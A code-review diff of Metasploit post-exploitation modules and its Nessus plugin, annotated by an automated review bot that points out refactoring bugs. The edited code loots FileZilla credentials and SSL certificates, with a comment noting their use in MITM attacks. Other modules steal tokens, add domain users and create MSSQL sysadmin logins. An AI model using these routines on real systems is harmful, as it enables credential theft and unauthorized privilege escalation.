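Review bot: The bare `rescue` wrapped around parse_interface discards the exception, so any failure inside the block is reported only as "Could not parse FileZilla Server Interface.xml" with no cause. `rescue StandardError => e` together with `vprint_error("Could not parse FileZilla Server Interface.xml: #{e.message}")` keeps the same scope and tells the operator what went wrong. When the block does fail, `lastserver` stays empty but is still written out by the store_loot call that follows, so an empty last-server loot file is produced silently; skipping that store_loot when `lastserver.empty?` would avoid it. The enclosing method starts before the hunk.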
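Review bot: In parse_config the `rescue REXML::ParseException` branch prints the error and then falls through to `opt = doc.elements.to_a("Settings/Item")` with `doc` unset, which raises NoMethodError on nil; the parallel rescue in parse_interface in this same commit returns its empty hash, so this one should return as well (presumably `return settings` — the method's start is outside the hunk). Separately, the default `ftp_port` is now the Integer 21 while the parsed value `opt[0].text` is a String, so `config['ftp_port']` is sometimes 21 and sometimes "21" by the time it reaches the service_data port and the CSV; `settings['ftp_port'] = Integer(opt[0].text) rescue 21` keeps one type and also covers a nil text.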
@@ -321,17 +345,14 @@ class MetasploitModule < Msf::Post end settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" || settings['ftp_bindip'].empty? - if settings['ssl'] == "1" - settings['ssl'] = "true" - else - if datastore['SSLCERT'] - print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") - end - settings['ssl'] = "false" + settings['ssl'] = settings['ssl'] == "1" + if !settings['ssl'] && datastore['SSLCERT'] + print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") end settings['ssl_certfile'] = items[45].text rescue "" - if settings['ssl_certfile'] != "" and settings['ssl'] == "true" and datastore['SSLCERT'] # lets get the file if its there could be useful in MITM attacks + # Get the file if it is there. It could be useful in MITM attacks + if settings['ssl_certfile'] != "" && settings['ssl'] and datastore['SSLCERT'] sslfile = session.fs.file.new(settings['ssl_certfile']) until sslfile.eof? sslcert << sslfile.read @@ -386,7 +407,7 @@ class MetasploitModule < Msf::Post account['host'] = settings['ftp_bindip'] account['port'] = settings['ftp_port'] - account['ssl'] = settings['ssl'] + account['ssl'] = settings['ssl'].to_s creds << account vprint_status(" Username: #{account['user']}") @@ -413,15 +434,23 @@ class MetasploitModule < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") + return lastser end opt = doc.elements.to_a("Settings/Item") - lastser['ip'] = opt[0].text rescue "" - lastser['port'] = opt[1].text rescue "" - lastser['password'] = opt[2].text rescue "" + opt.each do |item| + case item.attributes['name'] + when /Address/ + lastser['ip'] = item.text + when /Port/ + lastser['port'] = item.text + when /Password/ + lastser['password'] = item.text + end + end lastser['password'] = "" if lastser['password'].nil? 
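Review bot: The rewritten condition `if settings['ssl_certfile'] != "" && settings['ssl'] and datastore['SSLCERT']` mixes `&&` with the low-precedence `and` that the rest of this commit is removing; it evaluates as intended inside a bare `if`, but it is exactly the form that breaks once the expression is assigned or negated, so make it `if settings['ssl_certfile'] != "" && settings['ssl'] && datastore['SSLCERT']`. `settings['ssl'] = settings['ssl'] == "1"` changes the value's type from String to boolean, which is why the later hunk needs `account['ssl'] = settings['ssl'].to_s`; a one-line comment on the assignment such as `# ssl is a boolean from here on; the CSV output expects strings` would save the next reader the trace. The enclosing method starts and ends outside the hunk.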
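Review bot: In parse_interface the new `case item.attributes['name']` loop assigns `item.text` directly, so an empty `<Item>` leaves `lastser['ip']` or `lastser['port']` as nil where the old positional code produced ""; only the password is normalised afterwards. Using `item.text.to_s` in the three assignments, or extending the trailing `= "" if nil?` normalisation to ip and port, restores the previous contract for the vprint_status lines that interpolate these values. The `when /Address/`, `/Port/` and `/Password/` branches are substring regexes and would also match any longer attribute name containing those words — presumably fine for this file's settings, but exact string matches would be stricter if the names are known. The method's tail is outside the hunk.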
diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index b8e60b7d88..28e6aec748 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -191,7 +191,7 @@ class MetasploitModule < Msf::Post imail_user = datastore['IMAILUSER'] imail_domain = datastore['IMAILDOMAIN'] - print_status("Download iMail user information...") if datastore['VERBOSE'] == false + vprint_status("Download iMail user information...") #Download user data. If no user specified, we dump it all. users = download_info(imail_user, imail_domain) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 2eb16f4e0a..58f0b43137 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -278,7 +278,7 @@ class MetasploitModule < Msf::Post # If we can impersonate a token, we use that first. # If we can't, we'll try to MIGRATE (more aggressive) if the user wants to got_token = steal_token - if not got_token and datastore["MIGRATE"] + if !got_token && datastore["MIGRATE"] migrate_success = migrate end @@ -330,7 +330,7 @@ class MetasploitModule < Msf::Post end # Migrate back to the original process - if datastore["MIGRATE"] and @old_pid and migrate_success == true + if datastore["MIGRATE"] && @old_pid && migrate_success print_status("Migrating back...") migrate(@old_pid) end diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index d6a5ac35d2..9b83b10a67 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb 
@@ -223,12 +223,11 @@ class MetasploitModule < Msf::Post end ## steal token if neccessary - if (datastore['TOKEN'] == '') - token_found,token_user,current_user = token_hunter(domain) - - return if token_found == false - - datastore['TOKEN'] = token_user if current_user == false + if datastore['TOKEN'] == '' + token_found, token_user, current_user = token_hunter(domain) + if token_found && current_user == false + datastore['TOKEN'] = token_user + end end ## steal token @@ -247,7 +246,7 @@ class MetasploitModule < Msf::Post already_member_group = false ## Add user to the domain - if (datastore['ADDTODOMAIN'] == true) + if datastore['ADDTODOMAIN'] user_add_res = run_cmd("net user \"#{datastore['USERNAME']}\" /domain",false) if (user_add_res =~ /The command completed successfully/ and user_add_res =~ /Domain Users/) @@ -261,7 +260,7 @@ class MetasploitModule < Msf::Post end ## Add user to a domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] ## check if user is already a member of the group group_add_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) @@ -291,7 +290,7 @@ class MetasploitModule < Msf::Post end ## verify user was added to domain or domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] if already_member_group == false net_groups_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index c6fedab05f..695eba3ede 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb 
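Review bot: The rewrite drops `return if token_found == false`: when token_hunter finds no usable token the method previously stopped here, but now it continues into the `## steal token` step with `datastore['TOKEN']` still `''`. If that is intentional the hunk should say so in a comment; otherwise keep the early exit with `return unless token_found` placed before the `if token_found && current_user == false` line, which then simplifies to `if current_user == false`. The enclosing method starts and ends outside the hunk.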
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Post OptString.new('DB_USERNAME', [true, 'New sysadmin login', '']), OptString.new('DB_PASSWORD', [true, 'Password for new sysadmin login', '']), OptString.new('INSTANCE', [false, 'Name of target SQL Server instance', nil]), - OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', 'false']) + OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', false]) ], self.class) end diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index bd917e2343..55b430af9a 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -52,8 +52,8 @@ class MetasploitModule < Msf::Post print_status("Setting rpcapd as 'auto' service") service_change_startup("rpcapd", START_TYPE_AUTO) end - if datastore['ACTIVE']==true - if datastore['RHOST']==nil + if datastore['ACTIVE'] + if datastore['RHOST'].nil? print_error("RHOST is not set ") return else @@ -65,7 +65,7 @@ class MetasploitModule < Msf::Post print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ") p = prog << " -d -p #{datastore['PORT']} " end - if datastore['NULLAUTH']==true + if datastore['NULLAUTH'] p<< "-n" end run_rpcapd(p) diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index f3cb0e7f49..4ee17a767b 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Post n = datastore['ITERATIONS'] file = datastore['FILE'] - if datastore['ZERO']==true + if datastore['ZERO'] type = 0 print_status("The file will be overwritten with null bytes") end diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 99195b7cf0..7e31a2738c 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb 
@@ -36,10 +36,6 @@ module Msf
 "#{Msf::Config.local_directory}"
 end
 
-def cmd_nessus_index
-nessus_index
-end
-
 def commands
 {
 "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port ",
@@ -84,6 +80,155 @@ module Msf } end + def ncusage + print_status("%redYou must do this before any other commands.%clr") + print_status("Usage: ") + print_status("nessus_connect username:password@hostname:port ") + print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") + print_status("OR") + print_status("nessus_connect username@hostname:port ssl_verify") + print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect hostname:port ssl_verify") + print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect") + print_status("Example:> nessus_connect") + print_status("This only works after you have saved creds with nessus_save") + return + end + + #creates the index of exploit details to make searching for exploits much faster. + def create_xindex + start = Time.now + print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") + count = 0 + #Use Msf::Config.get_config_root as the location. + File.open("#{xindex}", "w+") do |f| + #need to add version line. + f.puts(Msf::Framework::Version) + framework.exploits.sort.each { |refname, mod| + stuff = "" + o = nil + begin + o = mod.new + rescue ::Exception + end + stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" + next if not o + o.references.map do |x| + if !(x.ctx_id == "URL") + if (x.ctx_id == "MSB") + stuff << "|#{x.ctx_val}" + else + stuff << "|#{x.ctx_id}-#{x.ctx_val}" + end + end + end + stuff << "\n" + f.puts(stuff) + } + end + total = Time.now - start + print_status("It has taken : #{total} seconds to build the exploits search index") + end + + def nessus_index + if File.exist?("#{xindex}") + #check if it's version line matches current version. + File.open("#{xindex}") { |f| + line = f.readline + line.chomp! 
+ if line.to_i == Msf::Framework::RepoRevision + print_good("Exploit Index - (#{xindex}) - is valid.") + else + create_xindex + end + } + else + create_xindex + end + end + + def nessus_login + if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) + print_status("You need to connect to a server first.") + ncusage + return + end + @url = "https://#{@host}:#{@port}/" + print_status("Connecting to #{@url} as #{@user}") + @n = Nessus::Client.new(@url, @user, @pass,@sslv) + if @n.authenticated + print_status("User #{@user} authenticated successfully.") + @token = 1 + else + print_error("Error connecting/logging to the server!") + return + end + end + + def nessus_verify_token + if @token.nil? or @token == '' + ncusage + return false + end + true + end + + def valid_policy(*args) + case args.length + when 1 + pid = args[0] + else + print_error("No Policy ID supplied.") + return + end + pol = @n.list_policies + pol["policies"].each { |p| + if p["template_uuid"] == pid + return true + end + } + return false + end + + def nessus_verify_db + if !(framework.db and framework.db.active) + print_error("No database has been configured, please use db_create/db_connect first") + return false + end + true + end + + def check_scan(*args) + case args.length + when 1 + scan_id = args[0] + else + print_error("No scan ID supplied") + return + end + scans = @n.scan_list + scans.each { |scan| + if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" + return true + end + } + return false + end + + def is_scan_complete(scan_id) + complete = false + status = @n.scan_list + status["scans"].each { |scan| + if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") + complete = true + end + } + complete + end + def cmd_nessus_help(*args) tbl = Rex::Ui::Text::Table.new( 'Columns' => [ 
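Review bot: create_xindex now writes `Msf::Framework::Version` as the index's first line, but nessus_index still validates it with `line.to_i == Msf::Framework::RepoRevision`; a version string such as 4.11.18 converts to 4, so the comparison fails and the index is rebuilt on every call. Reader and writer need to agree — either `if line == Msf::Framework::Version` in nessus_index, or keep writing `Msf::Framework::RepoRevision` as the removed copy of the method did. In the same method `stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"` runs before `next if not o`, so a module whose `mod.new` raised hits NoMethodError on nil; move the `next` above the append. `count = 0` in create_xindex is never used.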
@@ -153,82 +298,8 @@ module Msf print_line "" end - def ncusage - print_status("%redYou must do this before any other commands.%clr") - print_status("Usage: ") - print_status("nessus_connect username:password@hostname:port ") - print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") - print_status("OR") - print_status("nessus_connect username@hostname:port ssl_verify") - print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect hostname:port ssl_verify") - print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect") - print_status("Example:> nessus_connect") - print_status("This only works after you have saved creds with nessus_save") - return - end - - #creates the index of exploit details to make searching for exploits much faster. - def create_xindex - start = Time.now - print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") - count = 0 - #Use Msf::Config.get_config_root as the location. - File.open("#{xindex}", "w+") do |f| - #need to add version line. - f.puts(Msf::Framework::RepoRevision) - framework.exploits.sort.each { |refname, mod| - stuff = "" - o = nil - begin - o = mod.new - rescue ::Exception - end - stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" - next if not o - o.references.map do |x| - if !(x.ctx_id == "URL") - if (x.ctx_id == "MSB") - stuff << "|#{x.ctx_val}" - else - stuff << "|#{x.ctx_id}-#{x.ctx_val}" - end - end - end - stuff << "\n" - f.puts(stuff) - } - end - total = Time.now - start - print_status("It has taken : #{total} seconds to build the exploits search index") - end - - def nessus_index - if File.exist?("#{xindex}") - #check if it's version line matches current version. - File.open("#{xindex}") { |f| - line = f.readline - line.chomp! 
- if line.to_i == Msf::Framework::RepoRevision - print_good("Exploit Index - (#{xindex}) - is valid.") - else - create_xindex - end - } - else - create_xindex - end - end - - def nessus_verify_token - if @token.nil? or @token == '' - ncusage - return false - end - true + def cmd_nessus_index + nessus_index end def cmd_nessus_connect(*args) @@ -326,24 +397,6 @@ module Msf return end - def nessus_login - if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) - print_status("You need to connect to a server first.") - ncusage - return - end - @url = "https://#{@host}:#{@port}/" - print_status("Connecting to #{@url} as #{@user}") - @n = Nessus::Client.new(@url, @user, @pass,@sslv) - if @n.authenticated - print_status("User #{@user} authenticated successfully.") - @token = 1 - else - print_error("Error connecting/logging to the server!") - return - end - end - def cmd_nessus_save(*args) #if we are logged in, save session details to nessus.yaml if args[0] == "-h" @@ -370,15 +423,22 @@ module Msf end def cmd_nessus_server_properties(*args) - if args[0] == "-h" - print_status("nessus_server_feed") - print_status("Example:> nessus_server_feed") - print_status() - print_status("Returns information about the feed type and server version.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_properties") + print_status("Example:> nessus_server_properties -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + resp = @n.server_properties tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Feed', 'Type', 
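Review bot: In cmd_nessus_server_properties, `search_term = /#{args.shift}/nmi` accepts `-S` as the last argument: `args.shift` then returns nil and the regex becomes `//nmi`, which matches every row, so a missing term silently turns off the filter instead of being reported. The same branch is copied into cmd_nessus_server_status, cmd_nessus_template_list, cmd_nessus_folder_list, cmd_nessus_scanner_list and cmd_nessus_report_hosts in the later hunks and needs the same guard, ideally via one shared helper. Arguments not matched by the `case` are also dropped without a message, so a mistyped flag silently shows the unfiltered table; an `else` that prints the usage would catch that.
```ruby
when '-S', '--search'
  term = args.shift
  if term.nil?
    print_error("-S requires a search term")
    return
  end
  search_term = /#{term}/nmi
```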
@@ -392,14 +452,21 @@ module Msf end def cmd_nessus_server_status(*args) - if args[0] == "-h" - print_status("nessus_server_status") - print_status("Example:> nessus_server_status") - print_status() - print_status("Returns some status items for the server..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_status") + print_status("Example:> nessus_server_status -S searchterm") + print_status("Returns some status items for the server..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Status', 'Progress' @@ -410,14 +477,17 @@ module Msf end def cmd_nessus_admin(*args) - if args[0] == "-h" - print_status("nessus_admin") - print_status("Example:> nessus_admin") - print_status() - print_status("Checks to see if the current user is an admin") - print_status("Use nessus_user_list to list all users") - return + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_admin") + print_status("Example:> nessus_admin") + print_status("Checks to see if the current user is an admin") + print_status("Use nessus_user_list to list all users") + return + end end + if !nessus_verify_token return end 
@@ -429,15 +499,21 @@ module Msf end def cmd_nessus_template_list(*args) - if args[0] == "-h" - print_status("nessus_template_list | ") - print_status("Example:> nessus_template_list scan") - print_status("OR") - print_status("nessus_template_list policy") - print_status() - print_status("Returns a list of information about the scan or policy templates..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_template_list | ") + print_status("Example:> nessus_template_list scan -S searchterm") + print_status("OR") + print_status("nessus_template_list policy") + print_status("Returns a list of information about the scan or policy templates..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -450,7 +526,6 @@ module Msf print_status("Example:> nessus_template_list scan") print_status("OR") print_status("nessus_template_list policy") - print_status() print_status("Returns a list of information about the scan or policy templates..") return end @@ -465,11 +540,12 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Name', 'Title', 'Description', - 'Subscription Only', + 'Subscription Only', 'Cloud Only' ]) list["templates"].each { |template| @@ -479,12 +555,20 @@ module Msf print_line tbl.to_s end - def cmd_nessus_folder_list + def cmd_nessus_folder_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end list = @n.list_folders tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", 
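Review bot: cmd_nessus_folder_list gains an argument loop but, unlike every other command touched in this commit, has no `'-h', '--help'` case, so `nessus_folder_list -h` is silently ignored and the table is printed. Adding the usage branch keeps the commands consistent and gives the new `-S` option somewhere to be documented. The method's body continues past the end of the hunk.
```ruby
when '-h', '--help'
  print_status("nessus_folder_list")
  print_status("Example:> nessus_folder_list -S searchterm")
  return
```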
@@ -497,7 +581,19 @@ module Msf print_line tbl.to_s end - def cmd_nessus_scanner_list + def cmd_nessus_scanner_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scanner_list") + print_status("Example:> nessus_scanner_list -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end @@ -506,6 +602,7 @@ module Msf end list = @n.list_scanners tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", 
@@ -520,40 +617,31 @@ module Msf print_line tbl.to_s end - def check_scan(*args) - case args.length - when 1 - scan_id = args[0] - else - print_error("No scan ID supplied") - return - end - scans = @n.scan_list - scans.each { |scan| - if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" - return true - end - } - return false - end - def cmd_nessus_report_hosts(*args) - if args[0] == "-h" - print_status("nessus_report_hosts ") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_hosts -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id - else + + if scan_id.nil? print_status("Usage: ") - print_status("nessus_report_hosts ") + print_status("nessus_report_hosts -S searchterm") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", 
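Review bot: The `else scan_id = arg` branch in `cmd_nessus_report_hosts` treats every unrecognised token, including a mistyped option such as `-x`, as the scan id, and a second positional silently overwrites the first. This hunk also deletes `check_scan`, the only helper that verified a scan was `completed`, while the help text still promises that only completed scans can be reported; if nothing else in the commit replaces it, that guarantee is now unenforced. Consider `print_error("Unknown option #{arg}"); return` for tokens starting with `-` and, where the report call is made below the hunk, a completion check before it.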
@@ -576,22 +664,28 @@ module Msf end def cmd_nessus_report_vulns(*args) - if args[0] == "-h" - print_status("nessus_report_vulns ") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_vulns -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id.to_i - else + if scan_id.nil? print_status("Usage: ") print_status("nessus_report_vulns ") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", 
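Review bot: The rewrite of `cmd_nessus_report_vulns` drops the `scan_id = scan_id.to_i` coercion that the removed `case` did, so `scan_id` now reaches the report call (outside the hunk) as a String. If that code or the library compares ids with integers as `is_scan_complete` did, the lookup will silently miss; either restore `scan_id = arg.to_i` in the `else` branch or confirm the callee accepts strings. The method body continues past the hunk.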
@@ -613,21 +707,29 @@ module Msf end def cmd_nessus_report_host_details(*args) - if args[0] == "-h" - print_status("nessus_report_host_details ") - print_status("Example:> nessus_report_host_details 10 5") - print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") - print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") - return + search_term = nil + search_vuln = nil + scan_id = nil + host_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_details ") + print_status("Example:> nessus_report_host_details 10 5 -S hostinfo -SV vulninfo") + print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") + print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + when '-SV', '--search-vuln' + search_vuln = /#{args.shift}/nmi + else + scan_id = arg, + host_id = args.shift + end end - if !nessus_verify_token - return - end - case args.length - when 2 - scan_id = args[0] - host_id = args[1] - else + + if [scan_id, host_id].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_detail ") print_status("Example:> nessus_report_host_detail 10 5") @@ -636,6 +738,7 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -654,6 +757,7 @@ module Msf } print_line tbl.to_s tbl2 = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_vuln, 'Columns' => [ 'Plugin Name', 'Plugin Famil', 
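Review bot: `scan_id = arg, host_id = args.shift` parses as `scan_id = [arg, (host_id = args.shift)]`, so `scan_id` becomes a two-element Array and the later `[scan_id, host_id].any?(&:nil?)` guard never catches a missing scan id; drop the trailing comma and split it into `scan_id = arg` and `host_id = args.shift` on separate lines. The hunk also removes the `if !nessus_verify_token` check from `cmd_nessus_report_host_details` without re-adding it, so the command now proceeds to the API call without a valid session; add `return unless nessus_verify_token` before the usage check. The method body continues outside the hunk.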
@@ -698,27 +802,32 @@ module Msf end def cmd_nessus_report_host_ports(*args) - if args[0] == "-h" - print_status("nessus_report_host_ports ") - print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() - print_status("Returns all the ports associated with a host and details about their vulnerabilities") - print_status("Use nessus_report_hosts to list all available hosts for a report") + search_term = nil + rid = nil + host = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_ports ") + print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca -S searchterm") + print_status("Returns all the ports associated with a host and details about their vulnerabilities") + print_status("Use nessus_report_hosts to list all available hosts for a report") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 2 - host = args[0] - rid = args[1] - else + + if [host,rid].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_ports ") print_status("Use nessus_report_list to list all available reports") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Port', 'Protocol', @@ -744,7 +853,6 @@ module Msf if args[0] == "-h" print_status("nessus_report_del ") print_status("Example:> nessus_report_del f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Must be an admin to del reports.") print_status("Use nessus_report_list to list all reports") return 
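Review bot: In `cmd_nessus_report_host_ports` the `else` branch assigns `scan_id = arg`, but `host` and `rid` are never set, so `[host,rid].any?(&:nil?)` is always true and the command prints usage for every input. Replace it with `host = arg` followed by `rid = args.shift`. The hunk also removes the `nessus_verify_token` check from this command without replacing it; add `return unless nessus_verify_token` before the usage guard so the report is not requested without a valid session.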
@@ -775,13 +883,19 @@ module Msf end def cmd_nessus_scan_list(*args) - if args[0] == "-h" - print_status("nessus_scan_list") - print_status("Example:> nessus_scan_list") - print_status() - print_status("Returns a list of information about currently running scans.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scan_list") + print_status("Example:> nessus_scan_list -S searchterm") + print_status("Returns a list of information about currently running scans.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -791,6 +905,7 @@ module Msf return else tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Scan ID', 'Name', @@ -891,7 +1006,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause ") print_status("Example:> nessus_scan_pause f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Pauses a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -919,7 +1033,6 @@ module Msf def cmd_nessus_db_scan(*args) if args[0] == "-h" print_status("nessus_db_scan ") - print_status() print_status("Creates a scan based on all the hosts listed in db_hosts.") print_status("Use nessus_policy_list to list all available policies with their corresponding policy IDs") return @@ -966,7 +1079,6 @@ module Msf if args[0] == "-h" print_status("nessus_db_import ") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if !nessus_verify_db @@ -982,7 +1094,6 @@ module Msf print_status("Usage: ") print_status("nessus_db_import ") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if is_scan_complete(scan_id) 
@@ -1014,18 +1125,6 @@ module Msf else print_error("Only completed scans could be used for import") end - - end - - def is_scan_complete(scan_id) - complete = false - status = @n.scan_list - status["scans"].each { |scan| - if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") - complete = true - end - } - complete end def cmd_nessus_scan_pause_all(*args) @@ -1033,7 +1132,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause_all") print_status("Example:> nessus_scan_pause_all") - print_status() print_status("Pauses all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1061,7 +1159,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop ") print_status("Example:> nessus_scan_stop f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Stops a currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1091,7 +1188,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop_all") print_status("Example:> nessus_scan_stop_all") - print_status() print_status("stops all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1119,7 +1215,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume ") print_status("Example:> nessus_scan_resume f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("resumes a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -1149,7 +1244,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume_all") print_status("Example:> nessus_scan_resume_all") - print_status() print_status("resumes all currently running scans") print_status("Use nessus_scan_list to list all running scans") return 
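Review bot: This hunk deletes `is_scan_complete`, but `cmd_nessus_db_import` still calls `is_scan_complete(scan_id)` in the context shown in the previous hunk, so unless the method was moved into the Nessus library elsewhere in this commit, importing a scan now raises NoMethodError. If it was moved, keep the call working by delegating (`def is_scan_complete(scan_id) @n.is_scan_complete(scan_id) end`) or update the caller; if not, restore the method.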
